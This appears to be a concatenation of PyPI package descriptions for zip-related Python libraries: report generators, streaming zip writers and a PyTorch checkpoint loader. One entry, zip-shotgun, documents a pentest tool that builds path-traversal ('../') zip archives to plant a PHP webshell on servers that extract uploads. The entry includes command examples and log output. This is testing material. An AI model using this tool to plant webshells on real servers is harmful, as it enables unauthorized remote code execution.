zipreportVery lightweight module for creating PDF reports with PythonMotivationThis library is meant to be a drop-in replacement for report generation I was doing with Filemaker Pro and operates under about the same principles as print layout on Filemaker Pro. You, the client, have a list of ordered records, which can be any subscriptable thing but in my example aredicts, and these are fed into aDocumentobject you create and customize which establishes how fields in each record are formatted and laid out on the page, the formatting of page headers and footers, and summary headers and footers.ExampleIn theexampleyou can see how a basic report is customized. All formatting is contained in aDocumentobject, drawsPartobjects in various parts of the document based on certain conditions. Thepage_headerandpage_footerparts are drawn at the top and bottom of each page.Each record to be printed is displayed in acontent_part:content_part=Part(elements=[Element(x=0.,y=0.,width=72.,height=18.,content=FormattedText("N:$name",font_family='Futura',font_size=9.)),Element(x=96.,y=0,width=72.*4.,height=4.*72.,can_shrink=True,content=FormattedText("$comment",font_family='Futura',font_size=9.)),Element(x=72.*6,y=0.,width=36,height=18,content=FormattedText("$rn",font_family='Futura',font_size=9.,alignment='r'))],minimum_height=72.)APartcontains a list ofElementobjects which define a rectangle (positioned relative to the origin, the upper-left corner of the parentPart), and each element has a correspondingContent.Contentobjects contain specific style and content. TheFormattedTextcontent has a format string which can substitute values from a content object. For example above, the first element reades the 'name' key from the content object and substitutes it into the format string.Under ContructionThis project is still under contruction but functions on a basic level.
zipreport-lib
ZipReportTransform HTML templates into beautiful PDF or MIME reports, with full CSS and client Javascript support, under a permissive license.Want to see it in action? Check thisexample!Highlights:Create your reports using Jinja templates;Dynamic image support (embedding of runtime-generated images);Reports are packed in a single file for easy distribution or bundling;Optional MIME processor to embed resources in a single email message;Support for browser-generated JS content (with zipreport-server);Support for headers, page numbers and ToC (usingPagedJS, see details below);Requirements:Python >= 3.8Jinja2 >= 3.1Compatible backend for pdf generation (zipreport-server, xhtmltopdf, or WeasyPrint);v2.x.x breaking changesStarting with zipreport 2.0.0, support for the electron-based zipreport-cli rendering backend is removed; using azipreport-serverversion 2.0.0 or later - preferably using a docker container, is now the recommended approach.The behavior of the JS event approach has also changed; PDF rendering can now be triggered via console message, instead of dispatching an event.If you use JS events to trigger rendering, you need to update your templates.Old method:(...)// signal PDF generation after all DOM changes are performeddocument.dispatchEvent(newEvent('zpt-view-ready'))(...)New method, starting with v2.0.0:(...)// signal PDF generation after all DOM changes are performedconsole.log('zpt-view-ready')(...)InstallationInstalling via pip:$pipinstallzipreport-libTL;DR; exampleUsing zipreport-cli backend to render a report file:fromzipreportimportZipReportfromzipreport.reportimportReportFileLoader# existing zpt templatereport_file="report.zpt"# output fileoutput_file="result.pdf"# template variablesreport_data={'title':"Example report using Jinja templating",'color_list':['red','blue','green'],'description':'a long text field with some filler description',}# load report from filezpt=ReportFileLoader.load(report_file)# initialize api clientclient=ZipReport("https://127.0.0.1:6543","secretKey")job=client.create_job(zpt)# generate a PDF by calling the processor, using the API client# this method returns a JobResultresult=client.render(job,report_data)# if PDF generation was successful, save to fileifresult.success:withopen(output_file,'wb')asrpt:rpt.write(result.report.read())Paged.jsPagedJSis an amazing javascript library that performs pagination of HTML documents for print, under MIT license. It acts as polyfill for W3C specification for print, and allows the creation of headers, footers, page numbers, table of contents, etc. in the browser.To use PagedJS capabilities,zipreport-servermust be used as a backend.Available backendsZipreport-Serverzipreport-serveris a headless browser daemon orchestrator, designed specifically to work with ZipReport. It can be either installed locally or run via docker.zipreport-server is the only supported backend that enables full usage of client-side JavaScript and leveraging the PagedJS capabilities.WeasyPrintThis backend is provided for compatibility. For new projects, please use zipreport-server.WeasyPrintis a popular Python library to generate PDFs from HTML. It doesn't support JavaScript, and CSS is limited.DocumentationDetailed documentation on usage and report building is available on theproject documentation.
zipr-http
No description available on PyPI.
ziproto
ZiProtoZiProto is used to serialize data, ZiProto is designed with the intention to be used for transferring data instead of using something like JSON which can use up more bandwidth when you don't intend to have the data shown to the public or end-userSetuppythonsetup.pyinstallUsageTo encode data, this can be done simply>>importziproto>>ziproto.encode({"foo":"bar","fruits":['apple','banana']})bytearray(b'\x82\xa6fruits\x92\xa5apple\xa6banana\xa3foo\xa3bar')The same can be said when it comes to decoding>>importziproto>>Data=ziproto.encode({"foo":"bar","fruits":['apple','banana']})>>ziproto.decode(Data){'foo':'bar','fruits':['apple','banana']}To determine what type of variable you are dealing with, you could use the decoder>>importziproto>>fromziproto.ZiProtoDecoderimportDecoder>>Data=ziproto.encode({"foo":"bar","fruits":['apple','banana']})>>SuperDecoder=Decoder(Data)>>print(SuperDecoder.get_type())ValueType.MAPLicenseCopyright2018 Zi Xing NarrakasLicensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS"BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
zipseeker
Similar systems/projects:TheNginx zip module. Only for Nginx, so can’t be used with other webservers.python-zipstream. Does not support calculating the file size beforehand or seeing through the file.Usage:importzipseeker# Create an indexfp=zipseeker.ZipSeeker()fp.add('some/file.txt')fp.add('another/file.txt','file2.txt')# Calculate the total file size, e.g. for the Content-Length HTTP header.contentLength=fp.size()# Calculate the last-modified date, e.g. for the Last-Modified HTTP header.lastModified=fp.lastModified()# Send the ZIP file to the client# Optionally add the start and end parameters for range requests.# Note that the ZIP format doesn't support actually skipping parts of the file,# as it needs to calculate the CRC-32 of every file at the end of the file.fp.writeStream(outputFile)Why?While the file size of a ZIP file usually can’t be calculated beforehand due to compression, this is actually optional. The headers itself also have a pretty constant size. That means that the whole file can have a predetermined file size (and modtime).This is useful when you want to provide ZIP downloads of large directories with uncompressable files (e.g. images). The specific use case I created this media file for was to provide downloads of whole photo albums without such inconveniences as requesting a downloading link in an e-mail, using a lot system resources for the creation of temporary files, and having to delete these files afterwards.Of course, it’s possible to just stream a ZIP file, but that won’t provide any progress indication for file downloads and certainly doesn’t supportRange requests.For more information, see theNginx zip module.TODOImplement actual seeking in the file - this should be doable.Use a CRC-32 cache that can be shared by the calling module.
zipsender
No description available on PyPI.
zip-shotgun
ZIP ShotgunUtility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities. Idea for this script comes from this post onSilent Signal Techblog - Compressed File Upload And Command Executionand fromOWASP - Test Upload of Malicious FilesThis script will create archive which contains files with "../" in filename. When extracting this could cause files to be extracted to preceding directories. It can allow attacker to extract shells to directories which can be accessed from web browser.Default webshell is wwwolf's PHP web shell and all the credit for it goes to WhiteWinterWolf. Source is availableHEREInstallationInstall using Python pippip install zip-shotgun --upgradeClone git repository and installgit clone https://github.com/jpiechowka/zip-shotgun.gitExecute from root directory of the cloned repository (where setup.py file is located)pip install . --upgradeUsage and optionsUsage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE Options: --version Show the version and exit. -c, --directories-count INTEGER Count of how many directories to go back inside the zip file (e.g 3 means that 3 files will be added to the zip: shell.php, ../shell.php and ../../shell.php where shell.php is the name of the shell you provided or randomly generated value [default: 16] -n, --shell-name TEXT Name of the shell inside the generated zip file (e.g shell). If not provided it will be randomly generated. Cannot have whitespaces -f, --shell-file-path PATH A file that contains code for the shell. If this option is not provided wwwolf (https://github.com/WhiteWinterWolf/wwwolf- php-webshell) php shell will be added instead. If name is provided it will be added to the zip with the provided name or if not provided the name will be randomly generated. --compress Enable compression. If this flag is set archive will be compressed using DEFALTE algorithm with compression level of 9. By default there is no compression applied. -h, --help Show this message and exit.ExamplesUsing all default optionszip-shotgun archive.zipPart of the script output12/Dec/2018 Wed 23:13:13 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: BCsQOkiN23ur7OUj 12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored. 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php ... 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Finished. Try to access shell using BCsQOkiN23ur7OUj.php in the URLUsing default options and enabling compression for archive filezip-shotgun --compress archive.zipPart of the script output12/Dec/2018 Wed 23:16:13 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: 6B6NtnZXbXSubDCh 12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code 12/Dec/2018 Wed 23:16:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Wed 23:16:13 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9 ... 12/Dec/2018 Wed 23:16:13 +0100 | INFO | Finished. Try to access shell using 6B6NtnZXbXSubDCh.php in the URLUsing default options but changing the number of directories to go back in the archive to 3zip-shotgun --directories-count 3 archive.zipzip-shotgun -c 3 archive.zipThe script will write 3 files in total to the archivePart of the script output12/Dec/2018 Wed 23:17:43 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell name was not provided. Generated random shell name: 34Bv9YoignMHgk2F 12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored. 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Finished. Try to access shell using 34Bv9YoignMHgk2F.php in the URLUsing default options but providing shell name inside archive and enabling compressionShell name cannot have whitespaceszip-shotgun --shell-name custom-name --compress archive.zipzip-shotgun -n custom-name --compress archive.zipName for shell files inside the archive will be set to the one provided by the user.Part of the script output12/Dec/2018 Wed 23:19:12 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:19:12 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../../custom-name.php ... 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URLProvide custom shell file but use random name inside archive. Set directories count to 3zip-shotgun --directories-count 3 --shell-file-path ./custom-shell.php archive.zipzip-shotgun -c 3 -f ./custom-shell.php archive.zipShell code will be extracted from user provided file. Names inside the archive will be randomly generated.Part of the script output12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:21:37 +0100 | WARNING | Shell name was not provided. Generated random shell name: gqXRAJu1LD8d8VKf 12/Dec/2018 Wed 23:21:37 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Getting file extension from provided shell file for reuse: php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored. 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Finished. Try to access shell using gqXRAJu1LD8d8VKf.php in the URLProvide custom shell file and set shell name to save inside archive. Set directories count to 3 and use compressionzip-shotgun --directories-count 3 --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zipzip-shotgun -c 3 -n custom-name -f ./custom-shell.php --compress archive.zipShell code will be extracted from user provided file. Names inside the archive will be set to user provided name.Part of the script output12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:25:19 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Getting file extension from provided shell file for reuse: php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../../custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL
zipslicer
ZIPSLICER📁✂️A library for incremental loading of large PyTorch checkpointsRead a blogpost introduction by yours trulySynopsisimporttorchimportzipslicer# Could be a private custom recurrent sentient transformer# instead of a garden variety resnetmy_complicated_network=torch.hub.load("pytorch/vision:v0.10.0","resnet18",pretrained=True)s_dict=my_complicated_network.state_dict()torch.save(s_dict,"my_network_checkpoint_v123.pth")delmy_complicated_network# Later, on a smaller unrelated machine you load a "LazyStateDict"# Which is just like a regular state dict, but it loads tensors only when it has tolazy_s_dict=zipslicer.load("my_network_checkpoint_v123.pth")layer3_tensors={}forkinlazy_s_dict.keys():ifk.startswith("layer3"):layer3_tensors[k]=lazy_s_dict[k]# Now you have layer3's tensors and you can analyze them without breaking your RAM.# Or you can instantiate the layers' classes in sequence and compute the whole# network's output for a given input by threading the activations through them.# But we will just print the tensors instead:print(layer3_tensors)Run this example and unit-tests:python examples/example_resnet18.pypytest -o log_cli=true --capture=tee-sys -p no:asyncioTest your checkpoint for compatibility:python tests/test_checkpoint_readonly.py your_magnificent_checkpoint.pthIf it's all green, it will work.PrerequisitesSupported python and torch versions:python-3.10 + torch-(1.11,1.12,stable)python-3.11 + torch:stableGenerally,zipslicershould work with modern enough install of PyTorch - useincluded safe testto check for compatibility ofzipslicerwith your PyTorch and your checkpoint. This is a pure Python library, so specific CPU architecture shouldn't matter.A checkpoint produced by saving your model'sstate_dictvia vanilla torch.save(...) - default settings should suffice, as Torch doesn't use ZIP compression.An application that can take advantage of incrementally-loaded checkpoint - i.e. if your app just loads allstate_dict.items()in a loop right away it doesn't make much sense to use this library. Make sure your code readsstate_dict.keys()(andstate_dict.get_meta(k)if necessary) and uses these intelligently to work on a subset ofstate_dict[k]tensors at a time. For general inspiration you might readthis (HF)andthis (arxiv). With some additional engineering it should be possible to run Large Language Models likeBLOOM-176BorFLAN-T5-XXLon a single mid-range GPU at home - if you are willing to wait for a night's worth of time. In the large batch regime this might even make some practical sense, for example to process a set of documents into embeddings.InstallGenerally, copying thezipslicer/zipslicerdirectory into your project's source tree is enough.If you are a fan of official ceremony-driven install processes for executable modules of dubious provenance, soon there will be a possibility of installing this boutique software module via pip:pip install zipslicerNotesThis library is only for reading pytorch tensors from checkpoints. We leave writing for future work.Writing to loadedstate_dictis frowned upon, but itwillwork - though you should avoid doing this while iterating over keys for now and expecting the keys to reflect this update.Perhaps more importantly,general-purpose pickles are not supported- the design of this library doesn't allow you to load whole neural network class instances. Usually this isn't necessary, andpytorch official documentation recommends you to usestate_dictfor model serialization. We supportstate_dict's.Some rare tensor types (i.e: pytorch quantized tensors - not to be confused with integer tensors which work fine) are not yet supported. If this bothers you, share your experience in issues.We say "Hi" toHFsafetensorsproject, but note that in comparison to theirs, our approach doesn't require checkpoint conversion which takes significant time and storage. In fact, both approaches could be complementary, as you will have to load tensors from the pytorch checkpoint somehow to convert it tosafetensors- and the default loading mechanism is constrained by available RAM.Prospective features we are consideringIf you are interested in some of these features, consider creating an issue:Effective loading of tensor slices - to implement tensor parallelism in sharded deploymentsAccessing the source checkpoint over a networkWriting to a checkpoint in-placeIncremental conversion to other checkpoint formats
zipster-invoicing
No description available on PyPI.
zipstream
UNKNOWN
zipstreamer
# ZipStreamerZipStreamer is a Python library for generating ZIP files on-the-fly with ZIPfile size information.This library was implemented using logic from Python's `zipfile` library andGolang's `archive/zip` library.```pythonz = ZipStream(files=[ZipFile('file.txt', 4, lambda: StringIO('test'), None, None),ZipFile('emptydir/', None, None, None, None),ZipFile('dir/remote.txt', remote_file_size, get_remote_file, None, None),])size = z.size()res = Response(z.generate(), mimetype='application/zip')res.headers['Content-Length'] = str(size)```## Installation```pip install zipstreamer```## Examples```pip install flask requestsPYTHONPATH=. FLASK_APP=examples/flask_example.py flask run```## Testing```pipenv install --dev --skip-lockpipenv run nosetests```Testing multiple versions:```pip install pyenv tox tox-pyenvpyenv install 2.7.14pyenv install 3.4.8pyenv install 3.5.5pyenv install 3.6.4pyenv install 3.7-devpyenv local 2.7.14 3.4.8 3.5.5 3.6.4 3.7-devtox```
zipstream-new
python-zipstreamzipstream.py is a zip archive generator based on python 3.3's zipfile.py. It was created to generate a zip file generator for streaming (ie web apps). This is beneficial for when you want to provide a downloadable archive of a large collection of regular files, which would be infeasible to generate the archive prior to downloading or of a very large file that you do not want to store entirely on disk or on memory.The archive is generated as an iterator of strings, which, when joined, form the zip archive. For example, the following code snippet would write a zip archive containing files from 'path' to a normal file:importzipstreamz=zipstream.ZipFile()z.write('path/to/files')withopen('zipfile.zip','wb')asf:fordatainz:f.write(data)zipstream also allows to take as input a byte string iterable and to generate the archive as an iterator. This avoids storing large files on disk or in memory. To do so you could use something like this snippet:defiterable():for_inxrange(10):yieldb'this is a byte string\x01\n'z=zipstream.ZipFile()z.write_iter('my_archive_iter',iterable())withopen('zipfile.zip','wb')asf:fordatainz:f.write(data)Of course both approach can be combined:defiterable():for_inxrange(10):yieldb'this is a byte string\x01\n'z=zipstream.ZipFile()z.write('path/to/files','my_archive_files')z.write_iter('my_archive_iter',iterable())withopen('zipfile.zip','wb')asf:fordatainz:f.write(data)Since recent versions of web.py support returning iterators of strings to be sent to the browser, to download a dynamically generated archive, you could use something like this snippet:defGET(self):path='/path/to/dir/of/files'zip_filename='files.zip'web.header('Content-type','application/zip')web.header('Content-Disposition','attachment; filename="%s"'%(zip_filename,))returnzipstream.ZipFile(path)If the zlib module is available, zipstream.ZipFile can generate compressed zip archives.Installationpip install zipstream-newRequirementsPython 2.6+, 3.2+, [email protected]('/package.zip',methods=['GET'],endpoint='zipball')defzipball():defgenerator():z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)z.write('/path/to/file')forchunkinz:yieldchunkresponse=Response(generator(),mimetype='application/zip')response.headers['Content-Disposition']='attachment; filename={}'.format('files.zip')returnresponse# [email protected]('/package.zip',methods=['GET'],endpoint='zipball')defzipball():z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)z.write('/path/to/file')response=Response(z,mimetype='application/zip')response.headers['Content-Disposition']='attachment; filename={}'.format('files.zip')returnresponse# Partial flushing of the zip before [email protected]('/package.zip',methods=['GET'],endpoint='zipball')defzipball():defgenerate_zip_with_manifest():z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)manifest=[]forfilenameinos.listdir('/path/to/files'):z.write(os.path.join('/path/to/files',filename),arcname=filename)yield fromz.flush()manifest.append(filename)z.write_str('manifest.json',json.dumps(manifest).encode())yield fromzresponse=Response(z,mimetype='application/zip')response.headers['Content-Disposition']='attachment; filename={}'.format('files.zip')returnresponsedjango 1.5+fromdjango.httpimportStreamingHttpResponsedefzipball(request):z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)z.write('/path/to/file')response=StreamingHttpResponse(z,content_type='application/zip')response['Content-Disposition']='attachment; filename={}'.format('files.zip')returnresponsewebpydefGET(self):path='/path/to/dir/of/files'zip_filename='files.zip'web.header('Content-type','application/zip')web.header('Content-Disposition','attachment; filename="%s"'%(zip_filename,))returnzipstream.ZipFile(path)Running testsWith python version > 2.6, just run the following command:python -m unittest discoverAlternatively, you can usenose.If you want to run the tests on all supported Python versions, runtox.
zipstream-new-2
python-zipstreamzipstream.py is a zip archive generator based on python 3.3's zipfile.py. It was created to generate a zip file generator for streaming (ie web apps). This is beneficial for when you want to provide a downloadable archive of a large collection of regular files, which would be infeasible to generate the archive prior to downloading or of a very large file that you do not want to store entirely on disk or on memory.The archive is generated as an iterator of strings, which, when joined, form the zip archive. For example, the following code snippet would write a zip archive containing files from 'path' to a normal file:importzipstreamz=zipstream.ZipFile()z.write('path/to/files')withopen('zipfile.zip','wb')asf:fordatainz:f.write(data)zipstream also allows to take as input a byte string iterable and to generate the archive as an iterator. This avoids storing large files on disk or in memory. To do so you could use something like this snippet:defiterable():for_inxrange(10):yieldb'this is a byte string\x01\n'z=zipstream.ZipFile()z.write_iter('my_archive_iter',iterable())withopen('zipfile.zip','wb')asf:fordatainz:f.write(data)Of course both approach can be combined:defiterable():for_inxrange(10):yieldb'this is a byte string\x01\n'z=zipstream.ZipFile()z.write('path/to/files','my_archive_files')z.write_iter('my_archive_iter',iterable())withopen('zipfile.zip','wb')asf:fordatainz:f.write(data)Since recent versions of web.py support returning iterators of strings to be sent to the browser, to download a dynamically generated archive, you could use something like this snippet:defGET(self):path='/path/to/dir/of/files'zip_filename='files.zip'web.header('Content-type','application/zip')web.header('Content-Disposition','attachment; filename="%s"'%(zip_filename,))returnzipstream.ZipFile(path)If the zlib module is available, zipstream.ZipFile can generate compressed zip archives.Installationpip install zipstream-new-2RequirementsPython 2.6+, 3.2+, [email protected]('/package.zip',methods=['GET'],endpoint='zipball')defzipball():defgenerator():z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)z.write('/path/to/file')forchunkinz:yieldchunkresponse=Response(generator(),mimetype='application/zip')response.headers['Content-Disposition']='attachment; filename={}'.format('files.zip')returnresponse# [email protected]('/package.zip',methods=['GET'],endpoint='zipball')defzipball():z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)z.write('/path/to/file')response=Response(z,mimetype='application/zip')response.headers['Content-Disposition']='attachment; filename={}'.format('files.zip')returnresponse# Partial flushing of the zip before [email protected]('/package.zip',methods=['GET'],endpoint='zipball')defzipball():defgenerate_zip_with_manifest():z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)manifest=[]forfilenameinos.listdir('/path/to/files'):z.write(os.path.join('/path/to/files',filename),arcname=filename)yield fromz.flush()manifest.append(filename)z.write_str('manifest.json',json.dumps(manifest).encode())yield fromzresponse=Response(z,mimetype='application/zip')response.headers['Content-Disposition']='attachment; filename={}'.format('files.zip')returnresponsedjango 1.5+fromdjango.httpimportStreamingHttpResponsedefzipball(request):z=zipstream.ZipFile(mode='w',compression=zipstream.ZIP_DEFLATED)z.write('/path/to/file')response=StreamingHttpResponse(z,content_type='application/zip')response['Content-Disposition']='attachment; filename={}'.format('files.zip')returnresponsewebpydefGET(self):path='/path/to/dir/of/files'zip_filename='files.zip'web.header('Content-type','application/zip')web.header('Content-Disposition','attachment; filename="%s"'%(zip_filename,))returnzipstream.ZipFile(path)Running testsWith python version > 2.6, just run the following command:python -m unittest discoverAlternatively, you can usenose.If you want to run the tests on all supported Python versions, runtox.
zipstream-ng
zipstream-ngA modern and easy to use streamable zip file generator. It can package and stream many files and folders into a zip on the fly without needing temporary files or excessive memory. It can also calculate the final size of the zip file before streaming it.Features:Generates zip data on the fly as it's requested.Can calculate the total size of the resulting zip file before generation even begins.Low memory usage: Since the zip is generated as it's requested, very little has to be kept in memory (peak usage of less than 20MB is typical, even for TBs of files).Flexible API: Typical use cases are simple, complicated ones are possible.Supports zipping data from files, bytes, strings, and any other iterable objects.Keeps track of the date of the most recently modified file added to the zip file.Threadsafe: Won't mangle data if multiple threads concurrently add data to the same stream.Includes a clone of Python'shttp.servermodule with zip support added. Trypython -m zipstream.server.Automatically uses Zip64 extensions, but only if they are required.No external dependencies.Ideal for web backends:Generating zip data on the fly requires very little memory, no disk usage, and starts producing data with less latency than creating the entire zip up-front. This means faster responses, no temporary files, and very low memory usage.The ability to calculate the total size of the stream before any data is actually generated (provided no compression is used) means web backends can provide aContent-Lengthheader in their responses. This allows clients to show a progress bar as the stream is transferred.By keeping track of the date of the most recently modified file added to the zip, web backends can provide aLast-Modifiedheader. This allows clients to check if they have the most up-to-date version of the zip with just a HEAD request instead of having to download the entire thing.Installationpip install zipstream-ngExamplesCreate a local zip file (simple example)Make an archive namedfiles.zipin the current directory that contains all files under/path/to/files.fromzipstreamimportZipStreamzs=ZipStream.from_path("/path/to/files/")withopen("files.zip","wb")asf:f.writelines(zs)Create a local zip file (demos more of the API)fromzipstreamimportZipStream,ZIP_DEFLATED# Create a ZipStream that uses the maximum level of Deflate compression.zs=ZipStream(compress_type=ZIP_DEFLATED,compress_level=9)# Set the zip file's comment.zs.comment="Contains compressed important files"# Add all the files under a path.# Will add all files under a top-level folder called "files" in the zip.zs.add_path("/path/to/files/")# Add another file (will be added as "data.txt" in the zip file).zs.add_path("/path/to/file.txt","data.txt")# Add some random data from an iterable.# This generator will only be run when the stream is generated.defrandom_data():importrandomfor_inrange(10):yieldrandom.randbytes(1024)zs.add(random_data(),"random.bin")# Add a file containing some static text.# Will automatically be encoded to bytes before being added (uses utf-8).zs.add("This is some text","README.txt")# Write out the zip file as it's being generated.# At this point the data in the files will be read in and the generator# will be iterated over.withopen("files.zip","wb")asf:f.writelines(zs)zipserver (included)A fully-functional and useful example can be found in the includedzipstream.servermodule. It's a clone of Python's built inhttp.serverwith the added ability to serve multiple files and folders as a single zip file. Try it out by installing the package and runningzipserver --helporpython -m zipstream.server --help.Integration with a Flask webappA very basicFlask-based file server that streams all the files under the requested path to the client as a zip file. It provides the total size of the stream in theContent-Lengthheader so the client can show a progress bar as the stream is downloaded. It also provides aLast-Modifiedheader so the client can check if it already has the most recent copy of the zipped data with aHEADrequest instead of having to download the file and check.Note that while this example works, it's not a good idea to deploy it as-is due to the lack of input validation and other checks.importos.pathfromflaskimportFlask,ResponsefromzipstreamimportZipStreamapp=Flask(__name__)@app.route("/",defaults={"path":"."})@app.route("/<path:path>")defstream_zip(path):name=os.path.basename(os.path.abspath(path))zs=ZipStream.from_path(path)returnResponse(zs,mimetype="application/zip",headers={"Content-Disposition":f"attachment; filename={name}.zip","Content-Length":len(zs),"Last-Modified":zs.last_modified,})if__name__=="__main__":app.run(host="0.0.0.0",port=5000)Partial generation and 